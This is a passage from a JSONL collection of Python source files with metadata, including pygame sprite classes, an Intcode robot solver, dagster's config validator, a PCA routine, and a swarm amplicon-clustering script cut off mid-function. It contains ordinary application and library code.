mymob[\"y\"]>38 :\n\t\tmymob[\"Vy\"] = -1\n\telif mymob[\"y\"]<5 :\n\t\tmymob[\"Vy\"] = 1\n\n\tlog = [mymob, allEntity]\n\treturn log\n\n#######################################\n\"\"\"\nMY FUNCTION\n\"\"\"\n######################################\ndef get_player(allEntity) : \n\tfor mob in allEntity[\"mobs\"] :\n\t\tif mob[\"Name\"] == \"Asheiya Briceval\":\n\t\t\treturn mob\n\treturn None","sub_path":"AI.py","file_name":"AI.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"304344118","text":"# this file should contain base classes for sprites and tiles\n\nimport pygame\nimport math\n\nimport data\n\nclass Object(pygame.sprite.Sprite):\n\n def __init__(self, centerPoint, imageList, activeAI, player):\n self.player = player # keeps track of the player character\n self.imageList = imageList # the current image list\n self.frame = 0 # for cycling through images\n self.frame_speed = 1\n self.image = self.imageList[self.frame/self.frame_speed]\n\n pygame.sprite.Sprite.__init__(self)\n self.rect = self.image.get_rect()\n self.rect.center = centerPoint\n\n self.dead = False # being removed from play?\n self.falling = False # affected by gravity?\n self.facing = 0\t # which way it is moving\n self.xMove,self.yMove = 0,0 # for movement\n self.anim_image = None # for when the object is just\n # a hitbox\n\n self.ai_counter = 0\t # for switching AI states\n self.currentAI = activeAI # the function to be called\n # every refresh dictating behavior\n\n def update(self):\n\n self.currentAI()\n\n def updateImage(self): # cycle through images\n\n self.image = self.imageList[self.frame/self.frame_speed]\n self.frame += 1\n if self.frame >= len(self.imageList) * self.frame_speed:\n self.frame = 0\n\n def switchAI(self, newAI, imageList, frame_speed):\n\n self.anim_image.frame_speed = frame_speed\n self.anim_image.frame = 0\n self.anim_image.imageList = imageList\n self.currentAI = newAI\n self.AI_counter = 0\n\n def basicMovement(self, x_move, y_move, move_screen):\n\n if self.falling:\n self.fall_speed += data.gravity\n if self.fall_speed > data.terminal_velocity:\n self.fall_speed = data.terminal_velocity\n\n self.rect.x += x_move\n if move_screen:\n x,y = self.rect.center\n x += data.bgs_x\n if x < data.screen_padding and x_move < 0:\n data.bgs_x -= x_move\n elif x > data.screen_width - data.screen_padding and x_move > 0:\n data.bgs_x -= x_move\n # handle collisions here!\n\n self.rect.y += y_move\n if move_screen:\n x,y = self.rect.center\n y += data.bgs_y\n if y < data.screen_padding and y_move:\n data.bgs_y -= y_move\n elif y > data.screen_height - data.screen_padding and y_move:\n data.bgs_y -= y_move\n # handle more collisions\n","sub_path":"scripts/objects.py","file_name":"objects.py","file_ext":"py","file_size_in_byte":2660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"231522905","text":"import sys\n\nsys.path.append(\"..\")\nfrom utils.utils import IntComputer, Program\n\nmem = list(map(int, open('task_1_input.txt', 'r').readline().split(',')))\n\nx, y = 0, 0\npainted = set()\ncurr_rot = 'u' # u - up, d - down, l - left, r - right\nrot_lkp = {\n 'u': {0: ('l', (-1, 0)), 1: ('r', (1, 0))},\n 'd': {0: ('r', (1, 0)), 1: ('l', (-1, 0))},\n 'l': {0: ('d', (0, 1)), 1: ('u', (0, -1))},\n 'r': {0: ('u', (0, -1)), 1: ('d', (0, 1))},\n}\npanel_map = [['#']]\n\n\nint_comp = IntComputer()\nint_comp.add_program(Program(mem, [1]))\n\n\ndef adjust_painted(painted, x, y):\n adj = set()\n for pos in painted:\n adj.add((pos[0] + x, pos[1] + y))\n\n return adj\n\n\nwhile int_comp.programs[0].status != 0:\n int_comp.run_prog()\n if int_comp.programs[0].outputs:\n color, rot = int_comp.programs[0].outputs\n color = '.' if color == 0 else '#'\n\n # clear output\n int_comp.programs[0].reset_output()\n\n # save color info\n painted.add((x, y))\n panel_map[y][x] = color\n\n # adjust panel_map\n lkp = rot_lkp[curr_rot][rot]\n curr_rot = lkp[0]\n x, y = x + lkp[1][0], y + lkp[1][1]\n\n if x < 0:\n for e, row in enumerate(panel_map):\n panel_map[e] = ['.'] + row\n x = 0\n painted = adjust_painted(painted, 1, 0)\n elif x == len(panel_map[0]):\n for e, row in enumerate(panel_map):\n panel_map[e] = panel_map[e] + ['.']\n\n if y < 0:\n panel_map = [['.'] * len(panel_map[0])] + panel_map\n y = 0\n painted = adjust_painted(painted, 0, 1)\n elif y == len(panel_map):\n\n panel_map.append(['.'] * len(panel_map[0]))\n\n inp = 0 if panel_map[y][x] == '.' else 1\n int_comp.programs[0].add_input(inp)\n\n\nfor row in panel_map:\n print(\"\".join(row).replace('.', ' '))\nprint()\n\n","sub_path":"day_11/task_2.py","file_name":"task_2.py","file_ext":"py","file_size_in_byte":1883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"134760463","text":"from setuptools import setup\nimport sys\n\nrequirements = []\n\nif sys.version_info < (3, 4):\n requirements.append('enum34')\n\nconfig = {\n 'name': 'heuris',\n 'description': 'Python client for heuris',\n 'author': 'Alex Young',\n 'author_email': 'alex@heuris.io',\n 'license': 'Apache License, Version 2.0',\n 'url': 'https://github.com/heurisio/heuris-py',\n 'version': '0.5.0',\n 'install_requires': requirements,\n 'packages': ['heuris']\n}\n\nsetup(**config)\n","sub_path":"pypi_install_script/heuris-0.5.0.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"401756926","text":"# Project Euler - 003\nimport timeit as t\n\n# No need for fancy tricks. Simple iterative factorizer does the job.\n# Since 600851475143 is odd, we don't have to check for even factors.\n# Only need to check half of the possible numbers.\n\n# Iterative Solution\ndef max_factor(n):\n factor = 1\n while n != 1:\n factor += 2 # No need to test even factors\n while not n % factor:\n n //= factor\n return factor\n\n# No-args functions for timeit module.\ndef f():\n return max_factor(600851475143)\n\n# A quick query to Wolfram|Alpha confirms the result.\n# \"factor 600851475143\"\n\n# Benchmarks\nprint(\"Timing 1000 runs.\")\nprint(\"Iterative:\", t.timeit(f, number=1000), \"seconds\")\nprint(\"Result:\", f())\n","sub_path":"001 - 100/P003.py","file_name":"P003.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"390989948","text":"import Queue\nfrom collections import deque\n\nimport mint\nfrom mint.core import Entity\nfrom mint.components import NIC\n\nclass Host(Entity):\n\n def __init__(self, name=None):\n super(Host, self).__init__(name=name)\n self.nic = NIC(self)\n self.port = self.nic.port\n\n def send(self, data):\n self.nic.send(data)\n\n def recv(self, n_bits):\n bits = deque()\n while len(bits) < n_bits:\n try:\n bit = self.nic.ibuffer.get(block=False)\n bits.append(bit)\n except Queue.Empty:\n mint.wait(0)\n return ''.join(map(str, bits))\n\nclass Hub(Entity):\n\n def __init__(self, name=None, n_ports=3):\n super(Hub, self).__init__(name=name, n_ports=n_ports)\n\n def run(self):\n while not mint.stopped():\n n = len(self.ports)\n sent_bits = ['0'] * n\n for i, port in enumerate(self.ports):\n bit = port.recv(1)\n if bit == '1':\n for j in range(n):\n if i != j:\n sent_bits[j] = '1'\n for i, port in enumerate(self.ports):\n port.send(sent_bits[i])\n","sub_path":"mint/_versions/20151108145245 fast sender & slow receiver/mint/devices.py","file_name":"devices.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"167120990","text":"from collections import namedtuple\nfrom enum import Enum\n\nimport six\n\nfrom dagster import check\n\nfrom dagster.core.errors import DagsterError\nfrom dagster.utils import single_item\n\nfrom .config import ConfigType\nfrom .default_applier import apply_default_values\nfrom .field_utils import check_field_param\nfrom .type_printer import print_config_type_to_string\n\n\nclass DagsterEvaluationErrorReason(Enum):\n RUNTIME_TYPE_MISMATCH = 'RUNTIME_TYPE_MISMATCH'\n MISSING_REQUIRED_FIELD = 'MISSING_REQUIRED_FIELD'\n FIELD_NOT_DEFINED = 'FIELD_NOT_DEFINED'\n SELECTOR_FIELD_ERROR = 'SELECTOR_FIELD_ERROR'\n\n\nclass FieldNotDefinedErrorData(namedtuple('_FieldNotDefinedErrorData', 'field_name')):\n def __new__(cls, field_name):\n return super(FieldNotDefinedErrorData, cls).__new__(\n cls, check.str_param(field_name, 'field_name')\n )\n\n\nclass MissingFieldErrorData(namedtuple('_MissingFieldErrorData', 'field_name field_def')):\n def __new__(cls, field_name, field_def):\n return super(MissingFieldErrorData, cls).__new__(\n cls,\n check.str_param(field_name, 'field_name'),\n check_field_param(field_def, 'field_def'),\n )\n\n\nclass RuntimeMismatchErrorData(namedtuple('_RuntimeMismatchErrorData', 'config_type value_rep')):\n def __new__(cls, config_type, value_rep):\n return super(RuntimeMismatchErrorData, cls).__new__(\n cls,\n check.inst_param(config_type, 'config_type', ConfigType),\n check.str_param(value_rep, 'value_rep'),\n )\n\n\nclass SelectorTypeErrorData(namedtuple('_SelectorTypeErrorData', 'dagster_type incoming_fields')):\n def __new__(cls, dagster_type, incoming_fields):\n check.param_invariant(dagster_type.is_selector, 'dagster_type')\n return super(SelectorTypeErrorData, cls).__new__(\n cls, dagster_type, check.list_param(incoming_fields, 'incoming_fields', of_type=str)\n )\n\n\nERROR_DATA_TYPES = (\n FieldNotDefinedErrorData,\n MissingFieldErrorData,\n RuntimeMismatchErrorData,\n SelectorTypeErrorData,\n)\n\n\nclass EvaluationStack(namedtuple('_EvaluationStack', 'config_type entries')):\n def __new__(cls, config_type, entries):\n return super(EvaluationStack, cls).__new__(\n cls,\n check.inst_param(config_type, 'config_type', ConfigType),\n check.list_param(entries, 'entries', of_type=EvaluationStackEntry),\n )\n\n @property\n def levels(self):\n return [\n entry.field_name\n for entry in self.entries\n if isinstance(entry, EvaluationStackPathEntry)\n ]\n\n @property\n def type_in_context(self):\n ttype = self.entries[-1].config_type if self.entries else self.config_type\n # TODO: This is the wrong place for this\n # Should have general facility for unwrapping named types\n if ttype.is_nullable:\n return ttype.inner_type\n else:\n return ttype\n\n\nclass EvaluationStackEntry: # marker interface\n pass\n\n\nclass EvaluationStackPathEntry(\n namedtuple('_EvaluationStackEntry', 'field_name field_def'), EvaluationStackEntry\n):\n def __new__(cls, field_name, field_def):\n return super(EvaluationStackPathEntry, cls).__new__(\n cls,\n check.str_param(field_name, 'field_name'),\n check_field_param(field_def, 'field_def'),\n )\n\n @property\n def config_type(self):\n return self.field_def.config_type\n\n\nclass EvaluationStackListItemEntry(\n namedtuple('_EvaluationStackListItemEntry', 'config_type list_index'), EvaluationStackEntry\n):\n def __new__(cls, config_type, list_index):\n check.int_param(list_index, 'list_index')\n check.param_invariant(list_index >= 0, 'list_index')\n return super(EvaluationStackListItemEntry, cls).__new__(\n cls, check.inst_param(config_type, 'config_type', ConfigType), list_index\n )\n\n\nclass EvaluationError(namedtuple('_EvaluationError', 'stack reason message error_data')):\n def __new__(cls, stack, reason, message, error_data):\n return super(EvaluationError, cls).__new__(\n cls,\n check.inst_param(stack, 'stack', EvaluationStack),\n check.inst_param(reason, 'reason', DagsterEvaluationErrorReason),\n check.str_param(message, 'message'),\n check.inst_param(error_data, 'error_data', ERROR_DATA_TYPES),\n )\n\n\ndef friendly_string_for_error(error):\n type_in_context = error.stack.type_in_context\n\n path_msg, path = _get_friendly_path_info(error.stack)\n\n type_msg = _get_type_msg(error, type_in_context)\n\n if error.reason == DagsterEvaluationErrorReason.MISSING_REQUIRED_FIELD:\n return 'Missing required field \"{field_name}\" {path_msg} Expected: \"{type_msg}\"'.format(\n field_name=error.error_data.field_name,\n path_msg=path_msg,\n type_msg=print_config_type_to_string(type_in_context, with_lines=False),\n )\n elif error.reason == DagsterEvaluationErrorReason.FIELD_NOT_DEFINED:\n return 'Undefined field \"{field_name}\"{type_msg} {path_msg}'.format(\n field_name=error.error_data.field_name, path_msg=path_msg, type_msg=type_msg\n )\n elif error.reason == DagsterEvaluationErrorReason.RUNTIME_TYPE_MISMATCH:\n return 'Type failure at path \"{path}\"{type_msg}. Got \"{value_rep}\". {message}.'.format(\n path=path,\n type_msg=type_msg,\n value_rep=error.error_data.value_rep,\n message=error.message,\n )\n elif error.reason == DagsterEvaluationErrorReason.SELECTOR_FIELD_ERROR:\n if error.error_data.incoming_fields:\n return (\n 'Specified more than one field at path \"{path}\". '\n 'You can only specify one field at this level.'\n ).format(path=path)\n else:\n return (\n 'You specified no fields at path \"{path}\". '\n 'You must specify one and only one field at this level.'\n ).format(path=path)\n else:\n check.failed('not supported')\n\n\ndef _get_type_msg(error, type_in_context):\n if error.stack.type_in_context.is_system_config:\n return ''\n else:\n return ' on type \"{type_name}\"'.format(type_name=type_in_context.name)\n\n\ndef _get_friendly_path_msg(stack):\n return _get_friendly_path_info(stack)[0]\n\n\ndef _get_friendly_path_info(stack):\n if not stack.entries:\n path = ''\n path_msg = 'at document config root.'\n else:\n comps = ['root']\n for entry in stack.entries:\n if isinstance(entry, EvaluationStackPathEntry):\n comp = ':' + entry.field_name\n comps.append(comp)\n elif isinstance(entry, EvaluationStackListItemEntry):\n comps.append('[{i}]'.format(i=entry.list_index))\n else:\n check.failed('unsupported')\n\n path = ''.join(comps)\n path_msg = 'at path ' + path\n return path_msg, path\n\n\nclass DagsterEvaluateConfigValueError(DagsterError):\n '''Indicates invalid value was passed to a type's evaluate_value method'''\n\n def __init__(self, stack, *args, **kwargs):\n super(DagsterEvaluateConfigValueError, self).__init__(*args, **kwargs)\n self.stack = check.inst_param(stack, 'stack', EvaluationStack)\n\n\nclass EvaluateValueResult(namedtuple('_EvaluateValueResult', 'success value errors')):\n def __new__(cls, success, value, errors):\n return super(EvaluateValueResult, cls).__new__(\n cls,\n check.bool_param(success, 'success'),\n value,\n check.list_param(errors, 'errors', of_type=EvaluationError),\n )\n\n def errors_at_level(self, *levels):\n return list(self._iterate_errors_at_level(list(levels)))\n\n def _iterate_errors_at_level(self, levels):\n check.list_param(levels, 'levels', of_type=str)\n for error in self.errors:\n if error.stack.levels == levels:\n yield error\n\n\ndef stack_with_field(stack, field_name, field_def):\n return EvaluationStack(\n config_type=stack.config_type,\n entries=stack.entries + [EvaluationStackPathEntry(field_name, field_def)],\n )\n\n\ndef stack_with_list_index(stack, list_index):\n list_type = stack.type_in_context\n check.invariant(list_type.is_list)\n return EvaluationStack(\n config_type=stack.config_type,\n entries=stack.entries + [EvaluationStackListItemEntry(list_type.inner_type, list_index)],\n )\n\n\ndef hard_create_config_value(config_type, config_value):\n check.inst_param(config_type, 'config_type', ConfigType)\n result = evaluate_config_value(config_type, config_value)\n check.invariant(result.success)\n return result.value\n\n\ndef evaluate_config_value(config_type, config_value):\n check.inst_param(config_type, 'config_type', ConfigType)\n errors = validate_config(config_type, config_value)\n if errors:\n return EvaluateValueResult(success=False, value=None, errors=errors)\n\n value = apply_default_values(config_type, config_value)\n\n return EvaluateValueResult(success=True, value=value, errors=[])\n\n\ndef validate_config(config_type, config_value):\n check.inst_param(config_type, 'config_type', ConfigType)\n\n return list(\n _validate_config(\n config_type, config_value, EvaluationStack(config_type=config_type, entries=[])\n )\n )\n\n\ndef _validate_config(config_type, config_value, stack):\n check.inst_param(config_type, 'config_type', ConfigType)\n check.inst_param(stack, 'stack', EvaluationStack)\n\n if config_type.is_scalar:\n if not config_type.is_config_scalar_valid(config_value):\n yield EvaluationError(\n stack=stack,\n reason=DagsterEvaluationErrorReason.RUNTIME_TYPE_MISMATCH,\n message='Value \"{value}\" {path_msg} is not valid. Expected \"{type_name}\"'.format(\n path_msg=_get_friendly_path_msg(stack),\n value=config_value,\n type_name=config_type.name,\n ),\n error_data=RuntimeMismatchErrorData(\n config_type=config_type, value_rep=repr(config_value)\n ),\n )\n return\n\n errors = []\n\n if config_type.is_any:\n # no-op: we're safe\n return\n elif config_type.is_selector:\n errors = validate_selector_config_value(config_type, config_value, stack)\n elif config_type.is_composite:\n errors = validate_composite_config_value(config_type, config_value, stack)\n elif config_type.is_list:\n errors = validate_list_value(config_type, config_value, stack)\n elif config_type.is_nullable:\n errors = (\n []\n if config_value is None\n else _validate_config(config_type.inner_type, config_value, stack)\n )\n elif config_type.is_enum:\n errors = validate_enum_value(config_type, config_value, stack)\n else:\n check.failed('Unsupported type {name}'.format(name=config_type.name))\n\n for error in errors:\n yield error\n\n\ndef validate_enum_value(enum_type, config_value, stack):\n check.param_invariant(enum_type.is_enum, 'enum_type')\n check.inst_param(stack, 'stack', EvaluationStack)\n\n if not isinstance(config_value, six.string_types):\n yield EvaluationError(\n stack=stack,\n reason=DagsterEvaluationErrorReason.RUNTIME_TYPE_MISMATCH,\n message='Value for enum type {type_name} must be a string got {value}'.format(\n type_name=enum_type.name, value=config_value\n ),\n error_data=RuntimeMismatchErrorData(\n config_type=enum_type, value_rep=repr(config_value)\n ),\n )\n return\n\n if not enum_type.is_valid_config_enum_value(config_value):\n yield EvaluationError(\n stack=stack,\n reason=DagsterEvaluationErrorReason.RUNTIME_TYPE_MISMATCH,\n message=(\n 'Value not in enum type {type_name}. Got: {value}. '\n 'Possible values: {possible_values}.'\n ).format(\n type_name=enum_type.name,\n value=repr(config_value),\n possible_values=enum_type.config_values,\n ),\n error_data=RuntimeMismatchErrorData(\n config_type=enum_type, value_rep=repr(config_value)\n ),\n )\n return\n\n\n## Selectors\n\n\ndef validate_selector_config_value(selector_type, config_value, stack):\n check.param_invariant(selector_type.is_selector, 'selector_type')\n check.inst_param(stack, 'stack', EvaluationStack)\n\n if config_value and not isinstance(config_value, dict):\n yield EvaluationError(\n stack=stack,\n reason=DagsterEvaluationErrorReason.RUNTIME_TYPE_MISMATCH,\n message='Value for selector type {type_name} must be a dict got {value}'.format(\n type_name=selector_type.name, value=config_value\n ),\n error_data=RuntimeMismatchErrorData(\n config_type=selector_type, value_rep=repr(config_value)\n ),\n )\n return\n\n if config_value and len(config_value) > 1:\n incoming_fields = sorted(list(config_value.keys()))\n defined_fields = sorted(list(selector_type.fields.keys()))\n yield EvaluationError(\n stack=stack,\n reason=DagsterEvaluationErrorReason.SELECTOR_FIELD_ERROR,\n message=(\n 'You can only specify a single field. You specified {incoming_fields}. '\n 'The available fields are {defined_fields}'\n ).format(incoming_fields=incoming_fields, defined_fields=defined_fields),\n error_data=SelectorTypeErrorData(\n dagster_type=selector_type, incoming_fields=incoming_fields\n ),\n )\n return\n\n elif not config_value:\n defined_fields = sorted(list(selector_type.fields.keys()))\n if len(selector_type.fields) > 1:\n yield EvaluationError(\n stack=stack,\n reason=DagsterEvaluationErrorReason.SELECTOR_FIELD_ERROR,\n message=(\n 'Must specify a field if more one defined. Defined fields: ' '{defined_fields}'\n ).format(defined_fields=defined_fields),\n error_data=SelectorTypeErrorData(dagster_type=selector_type, incoming_fields=[]),\n )\n return\n\n field_name, field_def = single_item(selector_type.fields)\n\n if not field_def.is_optional:\n yield EvaluationError(\n stack=stack,\n reason=DagsterEvaluationErrorReason.SELECTOR_FIELD_ERROR,\n message=(\n 'Must specify the required field. Defined fields: ' '{defined_fields}'\n ).format(defined_fields=defined_fields),\n error_data=SelectorTypeErrorData(dagster_type=selector_type, incoming_fields=[]),\n )\n return\n\n incoming_field_value = field_def.default_value if field_def.default_provided else None\n\n else:\n check.invariant(config_value and len(config_value) == 1)\n\n field_name, incoming_field_value = single_item(config_value)\n if field_name not in selector_type.fields:\n print('calling ' + 'create_field_not_defined_error')\n yield create_field_not_defined_error(selector_type, stack, field_name)\n return\n\n parent_field = selector_type.fields[field_name]\n for error in _validate_config(\n parent_field.config_type,\n incoming_field_value,\n stack_with_field(stack, field_name, parent_field),\n ):\n yield error\n\n\n## Composites\n\n\ndef validate_composite_config_value(composite_type, config_value, stack):\n check.inst_param(composite_type, 'composite_type', ConfigType)\n check.param_invariant(composite_type.is_composite, 'composite_type')\n check.inst_param(stack, 'stack', EvaluationStack)\n\n path_msg, _path = _get_friendly_path_info(stack)\n\n if config_value and not isinstance(config_value, dict):\n yield EvaluationError(\n stack=stack,\n reason=DagsterEvaluationErrorReason.RUNTIME_TYPE_MISMATCH,\n message='Value {value} {path_msg} must be dict. Expected: \"{type_name}\".'.format(\n path_msg=path_msg,\n type_name=print_config_type_to_string(composite_type, with_lines=False),\n value=config_value,\n ),\n error_data=RuntimeMismatchErrorData(\n config_type=composite_type, value_rep=repr(config_value)\n ),\n )\n return\n\n # ASK: this can crash on user error\n config_value = check.opt_dict_param(config_value, 'incoming_value', key_type=str)\n\n fields = composite_type.fields\n\n defined_fields = set(fields.keys())\n incoming_fields = set(config_value.keys())\n\n for received_field in incoming_fields:\n if received_field not in defined_fields:\n yield create_field_not_defined_error(composite_type, stack, received_field)\n\n for expected_field, field_def in fields.items():\n if expected_field in incoming_fields:\n for error in _validate_config(\n field_def.config_type,\n config_value[expected_field],\n stack_with_field(stack, expected_field, field_def),\n ):\n yield error\n\n elif field_def.is_optional:\n pass\n\n else:\n check.invariant(not field_def.default_provided)\n yield create_missing_required_field_error(composite_type, stack, expected_field)\n\n\n## Lists\n\n\ndef validate_list_value(list_type, config_value, stack):\n check.param_invariant(list_type.is_list, 'list_type')\n check.inst_param(stack, 'stack', EvaluationStack)\n\n if not isinstance(config_value, list):\n yield EvaluationError(\n stack=stack,\n reason=DagsterEvaluationErrorReason.RUNTIME_TYPE_MISMATCH,\n message='Value {value} {path_msg} must be list. Expected: {type_name}'.format(\n path_msg=_get_friendly_path_msg(stack),\n value=config_value,\n type_name=print_config_type_to_string(list_type, with_lines=False),\n ),\n error_data=RuntimeMismatchErrorData(\n config_type=list_type, value_rep=repr(config_value)\n ),\n )\n return\n\n for index, item in enumerate(config_value):\n for error in _validate_config(\n list_type.inner_type, item, stack_with_list_index(stack, index)\n ):\n yield error\n\n\ndef create_field_not_defined_error(config_type, stack, received_field):\n check.param_invariant(config_type.has_fields, 'config_type')\n return EvaluationError(\n stack=stack,\n reason=DagsterEvaluationErrorReason.FIELD_NOT_DEFINED,\n message='Field \"{received}\" is not defined {path_msg} Expected: \"{type_name}\"'.format(\n path_msg=_get_friendly_path_msg(stack),\n type_name=print_config_type_to_string(config_type, with_lines=False),\n received=received_field,\n ),\n error_data=FieldNotDefinedErrorData(field_name=received_field),\n )\n\n\ndef create_missing_required_field_error(config_type, stack, expected_field):\n check.param_invariant(config_type.has_fields, 'config_type')\n return EvaluationError(\n stack=stack,\n reason=DagsterEvaluationErrorReason.MISSING_REQUIRED_FIELD,\n message='Missing required field \"{expected}\" {path_msg} Expected: \"{type_name}\".'.format(\n expected=expected_field,\n path_msg=_get_friendly_path_msg(stack),\n type_name=print_config_type_to_string(config_type, with_lines=False),\n ),\n error_data=MissingFieldErrorData(\n field_name=expected_field, field_def=config_type.fields[expected_field]\n ),\n )\n","sub_path":"python_modules/dagster/dagster/core/types/evaluator.py","file_name":"evaluator.py","file_ext":"py","file_size_in_byte":20011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"618850769","text":"from subprocess import check_output\nfrom time import time\n\nclass Py3status:\n\tdef date(self, i3status_output_json, i3status_config):\n\t\tresponse = {'name': 'date'}\n\t\tresponse['full_text'] = check_output([\"date\", \"+\\\"%a %b %d, %I:%M %p\\\"\"])[1:-2]\n\t\tresponse['cached_until'] = time() + 5\n\n\t\treturn (-1, response)\n\n\tdef on_click(self, i3status_output_json, i3status_config, event):\n\t\tempty = check_output(['terminator', '-x', 'calcurse'])","sub_path":"date.py","file_name":"date.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"440482235","text":"import numpy as np\n\ndef loadDataSet(filename, delim='\\t'):\n with open(filename) as f:\n stringArr = [line.strip().split(delim) for line in f.readlines()]\n dataArr = [list(map(float, line)) for line in stringArr]\n return dataArr\n\n'''\nimport mycode.Ch13.pca as pca\nimport numpy as np\ndataArr = pca.loadDataSet('./mycode/Ch13/testSet.txt')\nlowDMat, reconMat = pca.pca(dataArr)\npca.plot(np.mat(dataArr), reconMat)\n\nfrom importlib import reload\n'''\ndef pca(dataSet, topNfeat=9999999):\n dataMat = np.mat(dataSet)\n meanVals = np.mean(dataMat, axis=0)\n meanRemoved = dataMat - meanVals\n covMat = np.cov(meanRemoved, rowvar=0) # 协方差矩阵\n eigVals, eigVects = np.linalg.eig(np.mat(covMat)) # 求解特征值与特征向量,其中特征向量是列向量\n eigValIndex = np.argsort(eigVals)\n eigValIndex = eigValIndex[:-(topNfeat+1):-1] # 取topNfeat个较大特征对应的索引\n redEigVects = eigVects[:,eigValIndex]\n lowDDataMat = meanRemoved * redEigVects\n reconMat = (lowDDataMat * redEigVects.T) + meanVals\n print(eigVects)\n print(redEigVects)\n print(eigVects * eigVects.T)\n print(redEigVects * redEigVects.T)\n return lowDDataMat, reconMat\n\ndef plot(dataMat, reconMat):\n import matplotlib.pyplot as plt\n fig = plt.figure()\n ax = fig.add_subplot(111)\n ax.scatter(dataMat[:,0].flatten().A[0], dataMat[:,1].flatten().A[0], marker='^', s=90)\n ax.scatter(reconMat[:,0].flatten().A[0], reconMat[:,1].flatten().A[0], marker='o', s=50, c='red')\n plt.show()","sub_path":"mycode/Ch13/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"597175002","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Reproduced from:\n# Mahé F, Rognes T, Quince C, de Vargas C, Dunthorn M. (2014) \n# Swarm: robust and fast clustering method for amplicon-based studies. \n# PeerJ 2:e593 https://doi.org/10.7717/peerj.593\n#\n# Supplement 8: https://doi.org/10.7717/peerj.593/supp-8\n\n\n\n\"\"\"\n Detect and break chains of amplicons in a swarm.\n\"\"\"\n\nfrom __future__ import print_function\n\n__author__ = \"Frédéric Mahé \"\n__date__ = \"2014/01/30\"\n__version__ = \"$Revision: 1.1\"\n\nimport os\nimport sys\nimport tempfile\nimport itertools\nimport subprocess\nfrom operator import itemgetter\nfrom optparse import OptionParser\n\n#*****************************************************************************#\n# #\n# Functions #\n# #\n#*****************************************************************************#\n\n\ndef option_parse():\n \"\"\"\n Parse arguments from command line.\n \"\"\"\n desc = \"\"\"Detect and break chains of amplicons in a swarm. That\n script will search for the swarm binary in /usr/bin/. If swarm is\n installed at a different location, please modify the corresponding\n line in the function run_swarm.\"\"\"\n\n parser = OptionParser(usage=\"usage: %prog -f filename -s filename\",\n description=desc,\n version=\"%prog version 1.1\")\n\n parser.add_option(\"-b\", \"--binary\",\n metavar=\"\",\n action=\"store\",\n default=\"/usr/bin/swarm\",\n dest=\"binary\",\n help=\"swarm binary location. Default is /usr/bin/swarm\")\n\n parser.add_option(\"-f\", \"--fasta_file\",\n metavar=\"\",\n action=\"store\",\n dest=\"fasta_file\",\n help=\"set as fasta file.\")\n\n parser.add_option(\"-s\", \"--swarm_file\",\n metavar=\"\",\n action=\"store\",\n dest=\"swarm_file\",\n help=\"set as swarm file.\")\n\n parser.add_option(\"-d\", \"--differences\",\n metavar=\"\",\n action=\"store\",\n type=\"int\",\n default=1,\n dest=\"threshold\",\n help=\"set local clustering . Default is 1\")\n\n (options, args) = parser.parse_args()\n return options.binary, options.fasta_file, options.swarm_file, options.threshold\n\n\ndef fasta_parse(fasta_file):\n \"\"\"\n List amplicon ids, abundances and sequences, make a list and a dictionary\n \"\"\"\n with open(fasta_file, \"rU\") as fasta_file:\n all_amplicons = dict()\n for line in fasta_file:\n if line.startswith(\">\"):\n amplicon, abundance = line.strip(\">\\n\").split(\"_\")\n else:\n sequence = line.strip()\n all_amplicons[amplicon] = (int(abundance), sequence)\n return all_amplicons\n\n\ndef swarm_parse(swarm_file):\n \"\"\"\n List amplicons contained in each swarms, sort by decreasing\n abundance. Sort the list of swarms by decreasing mass and\n decreasing size.\n \"\"\"\n with open(swarm_file, \"rU\") as swarm_file:\n swarms = list()\n for line in swarm_file:\n amplicons = [(amplicon.split(\"_\")[0], int(amplicon.split(\"_\")[1]))\n for amplicon in line.strip().split(\" \")]\n # Sort amplicons by decreasing abundance and alphabetical order\n amplicons.sort(key=itemgetter(1, 0), reverse=True)\n top_amplicon, top_abundance = amplicons[0]\n swarm_size = len(amplicons)\n swarm_mass = sum([amplicon[1] for amplicon in amplicons])\n swarms.append([top_amplicon, swarm_mass, swarm_size,\n top_abundance, amplicons])\n # Sort swarms on mass, size and seed name\n swarms.sort(key=itemgetter(1, 2, 0), reverse=True)\n return swarms\n\n\ndef run_swarm(binary, all_amplicons, swarm, threshold):\n \"\"\"\n Write temporary fasta files, run swarm and collect the graph data\n \"\"\"\n swarm_command = [binary, \"-b\", \"-d\", str(threshold)]\n with open(os.devnull, \"w\") as devnull:\n with tempfile.SpooledTemporaryFile() as tmp_fasta_file:\n with tempfile.SpooledTemporaryFile() as tmp_swarm_results:\n for amplicon, abundance in swarm:\n sequence = all_amplicons[amplicon][1]\n print(\">\", amplicon, \"_\", str(abundance), \"\\n\", sequence,\n sep=\"\", file=tmp_fasta_file)\n tmp_fasta_file.seek(0) # rewind to the begining of the file\n proc = subprocess.Popen(swarm_command,\n stderr=tmp_swarm_results,\n stdout=devnull,\n stdin=tmp_fasta_file,\n close_fds=True)\n proc.wait() # usefull or not?\n tmp_swarm_results.seek(0) # rewind to the begining of the file\n graph_data = [line.strip().split(\"\\t\")[1:4]\n for line in tmp_swarm_results\n if line.startswith(\"@\")]\n return graph_data\n\n\ndef build_graph(graph_data):\n \"\"\"\n List pairwise relations in a swarm. Note that not all pairwise\n relations are stored. That's why the graph exploration must always\n start from the most abundant amplicon, and must be reiterated for\n sub-swarms after a breaking.\n \"\"\"\n graph = dict()\n for line in graph_data:\n 